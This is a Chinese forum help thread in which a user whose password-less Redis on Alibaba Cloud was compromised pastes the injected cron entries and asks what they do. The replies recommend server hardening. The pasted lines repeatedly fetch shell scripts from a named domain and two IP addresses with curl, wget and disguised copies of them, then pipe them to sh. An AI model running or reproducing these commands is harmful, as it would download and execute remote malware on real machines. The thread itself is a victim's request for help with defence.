求助,Docker上的Redis被攻击,怎么办?
本帖最后由 ruozhuliufeng 于 2021-11-4 18:00 编辑求助!在阿里云服务器上用Docker部署了Redis,开放6379端口,为了开放方便,没有添加密码。昨天使用完后,我清空了数据库,今早起来看到里面自动添加了这五条数据,**打开网址360提示会传播木马病毒**,求助各位大神,这语句是什么意思?如果是下载文件,这个文件是下载到哪里的?我的redis部署在docker中,这个文件对Linux系统有影响吗?如何防范这种攻击?刚刚已经更改了Redis的端口了。
```shell
*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh
*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh
*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
*/2 * * * * cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh
*/3 * * * * wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh
*/4 * * * * curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh
*/5 * * * * wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh```
阿里云服务加固
https://help.aliyun.com/knowledge_detail/37447.html#title-vka-frx-5u0 已完成,请求删帖 docker里的主机中了病毒不会影响到主机,应该是定时任务执行链接里的脚本 楼主怎么解决的,我的redis也是一样,值变成backup了 阿里云服务加固
https://help.aliyun.com/knowledge_detail/37447.html#title-vka-frx-5u0
页:
[1]